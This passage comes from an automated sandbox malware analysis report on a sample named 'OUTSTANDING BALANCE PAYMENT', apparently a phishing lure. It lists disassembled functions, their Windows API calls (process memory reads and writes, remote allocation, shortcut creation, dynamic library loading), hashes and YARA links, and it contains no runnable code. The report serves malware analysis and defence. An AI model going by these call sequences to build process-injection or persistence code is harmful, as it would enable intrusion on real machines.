                                                                  • Instruction Fuzzy Hash: 7DF01938011B05EFCB239FA5FD1C7543FA8AB02362F088315E829480F0CB3999A5CF50
                                                                  Function 002CF23D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CoInitialize.OLE32(00000000), ref: 002CF2DA
                                                                  • CoCreateInstance.OLE32(0030DA7C,00000000,00000001,0030D8EC,?), ref: 002CF2F2
                                                                  • CoUninitialize.OLE32 ref: 002CF555
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: CreateInitializeInstanceUninitialize
                                                                  • String ID: .lnk
                                                                  • API String ID: 948891078-24824748
                                                                  • Opcode ID: ab6fc9024b057027c638136942696ed6253c65ae94b1c1d565cc9944ae792ff9
                                                                  • Instruction ID: d6fbe7e573d884027791c8af341ac9f226de20159b82dda81ae892b10f8bb7fe
                                                                  • Opcode Fuzzy Hash: ab6fc9024b057027c638136942696ed6253c65ae94b1c1d565cc9944ae792ff9
                                                                  • Instruction Fuzzy Hash: BCA16975114201AFD700EFA4C881EABB7ECEF98708F10491DF15597292EB70EA59CBA2
                                                                  Function 002CE7DD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0028660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002853B1,?,?,002861FF,?,00000000,00000001,00000000), ref: 0028662F
                                                                  • CoInitialize.OLE32(00000000), ref: 002CE85D
                                                                  • CoCreateInstance.OLE32(0030DA7C,00000000,00000001,0030D8EC,?), ref: 002CE876
                                                                  • CoUninitialize.OLE32 ref: 002CE893
                                                                    • Part of subcall function 0028936C: __swprintf.LIBCMT ref: 002893AB
                                                                    • Part of subcall function 0028936C: __itow.LIBCMT ref: 002893DF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                  • String ID: .lnk
                                                                  • API String ID: 2126378814-24824748
                                                                  • Opcode ID: da201c8c13842355daa132f3f3fd03cb6575396827dafd4fb41c1fe448524200
                                                                  • Instruction ID: c9980d3d5c004ba136f6454629297cee4ffd5ff15ea0f4c1328a02f6eabc96cd
                                                                  • Opcode Fuzzy Hash: da201c8c13842355daa132f3f3fd03cb6575396827dafd4fb41c1fe448524200
                                                                  • Instruction Fuzzy Hash: E6A146356143019FCB14EF14C884E6ABBE5BF88710F158A8DF9969B3A2CB31EC55CB91
                                                                  Function 002A325D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __startOneArgErrorHandling.LIBCMT ref: 002A32ED
                                                                    • Part of subcall function 002AE0D0: __87except.LIBCMT ref: 002AE10B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorHandling__87except__start
                                                                  • String ID: pow
                                                                  • API String ID: 2905807303-2276729525
                                                                  • Opcode ID: d1ed6cc28caefd79d62c492cd061479add676b87ab0ea11495095374eee06df6
                                                                  • Instruction ID: 5966e663bd55155c15cedac52e63c5e59d962d9ef48f0369ffeaf30220c7dfa0
                                                                  • Opcode Fuzzy Hash: d1ed6cc28caefd79d62c492cd061479add676b87ab0ea11495095374eee06df6
                                                                  • Instruction Fuzzy Hash: 72513A71A3C20397CF16BF18C94137A7B98DB43750F208DA9F8C5851A9DF748DB69A82
                                                                  Function 002C4606 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0031DC50,?,0000000F,0000000C,00000016,0031DC50,?), ref: 002C4645
                                                                    • Part of subcall function 0028936C: __swprintf.LIBCMT ref: 002893AB
                                                                    • Part of subcall function 0028936C: __itow.LIBCMT ref: 002893DF
                                                                  • CharUpperBuffW.USER32(?,?,00000000,?), ref: 002C46C5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharUpper$__itow__swprintf
                                                                  • String ID: REMOVE$THIS
                                                                  • API String ID: 3797816924-776492005
                                                                  • Opcode ID: 1c1315633c3941a3843b8a63f7d367d3d43dfc3a234ad6f60c2840489c1022b4
                                                                  • Instruction ID: 13eff98591c5330bae9efe0440cab012029292378a06630fef7851feb522304d
                                                                  • Opcode Fuzzy Hash: 1c1315633c3941a3843b8a63f7d367d3d43dfc3a234ad6f60c2840489c1022b4
                                                                  • Instruction Fuzzy Hash: 55416C34A2020A9FCF01EFA4C895EAEB7B5BF49304F148159E916AB292DB349D65CF50
                                                                  Function 002BC189 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 002C430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,002BBC08,?,?,00000034,00000800,?,00000034), ref: 002C4335
                                                                  • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 002BC1D3
                                                                    • Part of subcall function 002C42D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,002BBC37,?,?,00000800,?,00001073,00000000,?,?), ref: 002C4300
                                                                    • Part of subcall function 002C422F: GetWindowThreadProcessId.USER32(?,?), ref: 002C425A
                                                                    • Part of subcall function 002C422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,002BBBCC,00000034,?,?,00001004,00000000,00000000), ref: 002C426A
                                                                    • Part of subcall function 002C422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,002BBBCC,00000034,?,?,00001004,00000000,00000000), ref: 002C4280
                                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 002BC240
                                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 002BC28D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                  • String ID: @
                                                                  • API String ID: 4150878124-2766056989
                                                                  • Opcode ID: 8dc7c4a5019f7c0d4ce1e1425eed44b0c38daedad77d8ba80bc5a126dcc3fde4
                                                                  • Instruction ID: a4979c6df17987939724dcbabe84cb9a905ad933202974805f172ef0c29a599e
                                                                  • Opcode Fuzzy Hash: 8dc7c4a5019f7c0d4ce1e1425eed44b0c38daedad77d8ba80bc5a126dcc3fde4
                                                                  • Instruction Fuzzy Hash: 81413B76900218AFDB11EFA4CC92FEEB7B8AB09700F104199FA45B7181DA716E55CF61
                                                                  Function 002EA63F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0031DC00,00000000,?,?,?,?), ref: 002EA6D8
                                                                  • GetWindowLongW.USER32 ref: 002EA6F5
                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 002EA705
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Long
                                                                  • String ID: SysTreeView32
                                                                  • API String ID: 847901565-1698111956
                                                                  • Opcode ID: 06d9ef01cc0938d2c2e66e8b530f3b98833d9614a7986df570b481716e2ef26d
                                                                  • Instruction ID: 0f9920addd59187548746340f76696a28a1e38b27bc7d5038613fb5fedd94e61
                                                                  • Opcode Fuzzy Hash: 06d9ef01cc0938d2c2e66e8b530f3b98833d9614a7986df570b481716e2ef26d
                                                                  • Instruction Fuzzy Hash: 0E31B031151246ABDF129F79CC45BEA77A9FB49324F244725F875931E0C770F8609B90
                                                                  Function 002D5180 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 96networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 002D5190
                                                                  • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 002D51C6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: CrackInternet_memset
                                                                  • String ID: |$D-
                                                                  • API String ID: 1413715105-3644889076
                                                                  • Opcode ID: 10dc10b660ff5080f7042c1b3dbe1a000ab86a44a45c884262003c27d0a527cf
                                                                  • Instruction ID: 21d6179a93c9c232e18ebe594a4be978ce546c3f3721adaec13876bd2fd1ffb5
                                                                  • Opcode Fuzzy Hash: 10dc10b660ff5080f7042c1b3dbe1a000ab86a44a45c884262003c27d0a527cf
                                                                  • Instruction Fuzzy Hash: 89313A75C11119ABCF01AFA4CC85AEE7FB9FF14740F104016EC05A62A6DB71AA26CF60
                                                                  Function 002EA0D6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 002EA15E
                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 002EA172
                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 002EA196
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window
                                                                  • String ID: SysMonthCal32
                                                                  • API String ID: 2326795674-1439706946
                                                                  • Opcode ID: d39e67f3f88b134668722c77d7ad136930d033a175c46fb5d57b34d495176c0c
                                                                  • Instruction ID: 3448d5f344df5912d72013d26ca6d7bce1a653a3c421fced6784a4b7a2d46757
                                                                  • Opcode Fuzzy Hash: d39e67f3f88b134668722c77d7ad136930d033a175c46fb5d57b34d495176c0c
                                                                  • Instruction Fuzzy Hash: CB21A132560219ABDF128F94CC82FEA3BB9EF48754F110214FE596B1D0D6B5BC61CBA0
                                                                  Function 002EA88A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 002EA941
                                                                  • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 002EA94F
                                                                  • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 002EA956
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$DestroyWindow
                                                                  • String ID: msctls_updown32
                                                                  • API String ID: 4014797782-2298589950
                                                                  • Opcode ID: 0335646854dcd6855a69915b38dfcd6e05262f83b12799295cd9f64088d79754
                                                                  • Instruction ID: 4e00ff19be99f764a39f00a2683e5952d9d679b2154a1434cc509343c637cedb
                                                                  • Opcode Fuzzy Hash: 0335646854dcd6855a69915b38dfcd6e05262f83b12799295cd9f64088d79754
                                                                  • Instruction Fuzzy Hash: A221B2B525020AAFDB01DF19CC91D7737ADEF5A394F450059FA049B2A2CB31FC218B61
                                                                  Function 002E99A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 002E9A30
                                                                  • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 002E9A40
                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 002E9A65
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$MoveWindow
                                                                  • String ID: Listbox
                                                                  • API String ID: 3315199576-2633736733
                                                                  • Opcode ID: b0be504700bfeb06693b0812d3a7fe8232d2c2aa17bd4bb6f23abb4d5f3ea6a6
                                                                  • Instruction ID: fef3facbfa439ee1f20f9a4ab26b63bc7d9a88f16356724c017d8b2f328455c2
                                                                  • Opcode Fuzzy Hash: b0be504700bfeb06693b0812d3a7fe8232d2c2aa17bd4bb6f23abb4d5f3ea6a6
                                                                  • Instruction Fuzzy Hash: F921D732660159BFDF128F55CC85FBB3BAEEF8A750F41812AF9445B190C671AC618BA0
                                                                  Function 002EA409 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 002EA46D
                                                                  • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 002EA482
                                                                  • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 002EA48F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID: msctls_trackbar32
                                                                  • API String ID: 3850602802-1010561917
                                                                  • Opcode ID: a6f0ffc4a659bf19bd926a8910a1106a4e4867b5eb2e54302aeb7ca7663d30d7
                                                                  • Instruction ID: d139af44200ef901042497c088354db463836a7f857a77807c9944ef69f178e3
                                                                  • Opcode Fuzzy Hash: a6f0ffc4a659bf19bd926a8910a1106a4e4867b5eb2e54302aeb7ca7663d30d7
                                                                  • Instruction Fuzzy Hash: 6511E771250249BEEF215F65CC45FAB37ADFF89754F014118FA45A60D1D6B2E821DB20
                                                                  Function 002A2287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,002A2350,?), ref: 002A22A1
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 002A22A8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: RoInitialize$combase.dll
                                                                  • API String ID: 2574300362-340411864
                                                                  • Opcode ID: 0dead584dbc8c302d8c143582d05dbc5a5980549f0cc0a937be6309fb531e6e2
                                                                  • Instruction ID: 9b126dc8abf9a94770aaad55cefbfc625733e0b27d5605dfe71247d97c5d434a
                                                                  • Opcode Fuzzy Hash: 0dead584dbc8c302d8c143582d05dbc5a5980549f0cc0a937be6309fb531e6e2
                                                                  • Instruction Fuzzy Hash: 1AE04F78BA1301ABEB675FB4ED8DB5436ACBB02702F004020F642D90E0CFB85054DF04
                                                                  Function 002A235C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,002A2276), ref: 002A2376
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 002A237D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: RoUninitialize$combase.dll
                                                                  • API String ID: 2574300362-2819208100
                                                                  • Opcode ID: 396d3bf2b2dfb1c68249817ace4d1207387bd74f45d0c9e745ab3af71b271798
                                                                  • Instruction ID: 3de81adb79dfcbf3867601a0146c1ad51a77858d1623ed6842cd04d7f01de246
                                                                  • Opcode Fuzzy Hash: 396d3bf2b2dfb1c68249817ace4d1207387bd74f45d0c9e745ab3af71b271798
                                                                  • Instruction Fuzzy Hash: BBE0B678656301EBDB2BAFA0ED1DB043AADB716706F100454F24AEA0B0CFB9A4149A14
                                                                  Function 002FAC59 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: LocalTime__swprintf
                                                                  • String ID: %.3d$WIN_XPe
                                                                  • API String ID: 2070861257-2409531811
                                                                  • Opcode ID: 59c243b42b7bb50a42eb0be086e0b4feaa4591413f45bc00395bdd1e519ae0da
                                                                  • Instruction ID: 14b3a7c85b628d5cdae64c5dc75b9ebc720472d48531ad0624672640e7d9d885
                                                                  • Opcode Fuzzy Hash: 59c243b42b7bb50a42eb0be086e0b4feaa4591413f45bc00395bdd1e519ae0da
                                                                  • Instruction Fuzzy Hash: B5E0ECB183561C9BCA129790CD45DFAF3BCA704781F1004A3FA0AA1010E7759BA4AA12
                                                                  Function 002E2205 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,002E21FB,?,002E23EF), ref: 002E2213
                                                                  • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 002E2225
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: GetProcessId$kernel32.dll
                                                                  • API String ID: 2574300362-399901964
                                                                  • Opcode ID: 0e391e6431907a9787a390e73f9f28cb2703834bcb72f3babdd979391aedcdaf
                                                                  • Instruction ID: 7db376870b38d6364b5b447fa195c2109c8b74869a40e8a14c82a581f309a354
                                                                  • Opcode Fuzzy Hash: 0e391e6431907a9787a390e73f9f28cb2703834bcb72f3babdd979391aedcdaf
                                                                  • Instruction Fuzzy Hash: F0D0A735850713DFD7275F71F84864276DCEB09301F00441AEC47E2150DB70D8848660
                                                                  Function 002842F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
